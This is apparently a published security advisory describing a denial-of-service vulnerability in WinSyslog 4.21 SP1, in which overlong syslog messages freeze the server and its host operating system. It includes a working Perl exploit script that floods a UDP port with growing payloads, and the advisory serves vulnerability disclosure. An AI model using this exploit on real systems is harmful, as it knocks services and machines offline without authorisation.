‘Security Vulnerability in WinSyslog (DoS)’

Summary

WinSyslog is ‘an enhanced syslog server for Windows’. A vulnerability in the product allows remote attackers to cause the WinSyslog to freeze, which in turn will also freeze the operating system on which the product executes.’

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability.’


Details

Vulnerable version:
 * WinSyslog version 4.21 SP1

By sending an arbitrary long Syslog messages to the WinSyslog program it is possible to cause it to freeze, when WinSyslog freezes the whole operating system will freeze with it.

Vendor response:
See Potential DoS in Interactive Syslog Server, for an official vendor response.

Exploit:
#!/usr/bin/perl
#WinSyslog System Freeze Vulnerability

use IO::Socket;
$host = ‘192.168.1.44’;
$port = ‘10514’;
$data = ‘A’;

$socket = IO::Socket::INET->new(Proto => ‘udp’) or die ‘Socket error: $@n’;
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

for ($count = 0; $count < 1000; $count ++) { $buf = '<00>‘;
$buf .= ‘A’x((600+$count)*4);

print ‘Length: ‘, length($buf), ‘n’;
send($socket, $buf, 0, $portaddr);
print ‘sentn’;
}

print ‘Donen’;’

Categories: Windows